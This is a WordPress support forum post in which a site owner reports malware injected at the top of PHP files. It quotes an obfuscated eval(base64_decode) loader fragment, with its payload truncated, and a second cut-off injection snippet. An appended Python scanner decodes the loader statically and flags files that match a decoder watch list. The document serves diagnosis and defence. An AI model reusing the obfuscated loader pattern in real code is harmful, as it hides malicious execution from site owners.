Title: Malware php code in read-only files
Last modified: August 20, 2016

---

# Malware php code in read-only files

 *  [learningmore](https://wordpress.org/support/users/learningmore/)
 * (@learningmore)
 * [14 years, 6 months ago](https://wordpress.org/support/topic/malware-php-code-in-read-only-files/)
 * All the PHP files have malware binary code inserted at the top of the file, but
   the files themselves are read-only. (Permission 444)
 * Here is an example:
 *     ```
       <?php function qzacgowokc($wnv){$a30q='64';$gvea='$w';$zqe='o';$youp='nv';$y9n0='$w';$i3pz='ase';$otfu='ec';$dk5j='d';$kihc='=b';$ako7='_';$x1i='de(';$jtkw=');';$vy='nv';eval($y9n0.$vy.$kihc.$i3pz.$a30q.$ako7.$dk5j.$otfu.$zqe.$x1i.$gvea.$youp.$jtkw);return $wnv;}$dhjwcu='NyJKCmNDIjdoQ2
       ```
 * I previously was hacked with the “google bot statistic” malware. I commented 
   on it at the end of the thread here:
    [http://wordpress.org/support/topic/links-to-my-site-being-replaced-with-spam?replies=9](http://wordpress.org/support/topic/links-to-my-site-being-replaced-with-spam?replies=9)
   Here is an example:
 *     ```
       <?php
         // This code use for global bot statistic
         $sUserAgent = strtolower($_SE
       ```
   
 * I’ve changed passwords, checked permissions, re-updated to WordPress, changed
   the theme and still it seems they are getting in. I’ve discussed it with my host
   but they haven’t gotten back to me (GoDaddy).
 * Does anyone have any tips on tracking how it is happening? Someone mentioned 
   seeing FTP logs but GoDaddy insists there aren’t FTP logs available.
 * Even if I go back to an old version of my site I think it will continue to happen.

The topic ‘Malware php code in read-only files’ is closed to new replies.
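Added example, not part of the original post: a static check that rebuilds the string passed to `eval()` in the header quoted above by substituting the single-quoted fragments, without executing any PHP, and then lists `.php` files under a directory whose first bytes carry the same pattern, together with their mode and modification time. The function names, the `DECODERS` watch list and the 4096-byte head size are assumptions made for this illustration.

```python
import os
import re
import stat
import time

# Constructed sample: the injected header quoted in the post (its payload string is cut off there too).
SAMPLE = (
    r"<?php function qzacgowokc($wnv){$a30q='64';$gvea='$w';$zqe='o';$youp='nv';"
    r"$y9n0='$w';$i3pz='ase';$otfu='ec';$dk5j='d';$kihc='=b';$ako7='_';$x1i='de(';"
    r"$jtkw=');';$vy='nv';eval($y9n0.$vy.$kihc.$i3pz.$a30q.$ako7.$dk5j.$otfu.$zqe."
    r"$x1i.$gvea.$youp.$jtkw);return $wnv;}$dhjwcu='NyJKCmNDIjdoQ2"
)

ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;")
EVAL_CONCAT = re.compile(r"eval\s*\(\s*((?:\$\w+\s*\.\s*)+\$\w+)\s*\)")
DECODERS = ("base64_decode", "gzinflate", "gzuncompress", "str_rot13")  # assumed watch list

def resolve_eval_strings(php_source):
    """Rebuild, by text substitution only, the string each eval($a.$b...) would receive."""
    table = dict(ASSIGN.findall(php_source))
    out = []
    for match in EVAL_CONCAT.finditer(php_source):
        names = re.findall(r"\$(\w+)", match.group(1))
        if all(name in table for name in names):
            out.append("".join(table[name] for name in names))
    return out

def is_injected(php_source):
    return any(d in s for s in resolve_eval_strings(php_source) for d in DECODERS)

def scan_tree(root, head_bytes=4096):
    """Return (path, octal mode, mtime in UTC) for .php files whose head carries the pattern."""
    hits = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(folder, name)
            with open(path, "r", errors="replace") as fh:
                head = fh.read(head_bytes)
            if is_injected(head):
                st = os.stat(path)
                hits.append((path, oct(stat.S_IMODE(st.st_mode)),
                             time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(st.st_mtime))))
    return hits

if __name__ == "__main__":
    print(resolve_eval_strings(SAMPLE))
```

The modification times of the flagged files give a time window to compare against whatever access or upload logs the host can supply.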

## Tags

 * [binary](https://wordpress.org/support/topic-tag/binary/)
 * [code](https://wordpress.org/support/topic-tag/code/)
 * [godaddy](https://wordpress.org/support/topic-tag/godaddy/)
 * [permissions](https://wordpress.org/support/topic-tag/permissions/)
 * [php](https://wordpress.org/support/topic-tag/php/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 0 replies
 * 1 participant
 * Last reply from: [learningmore](https://wordpress.org/support/users/learningmore/)
 * Last activity: [14 years, 6 months ago](https://wordpress.org/support/topic/malware-php-code-in-read-only-files/)
 * Status: not resolved

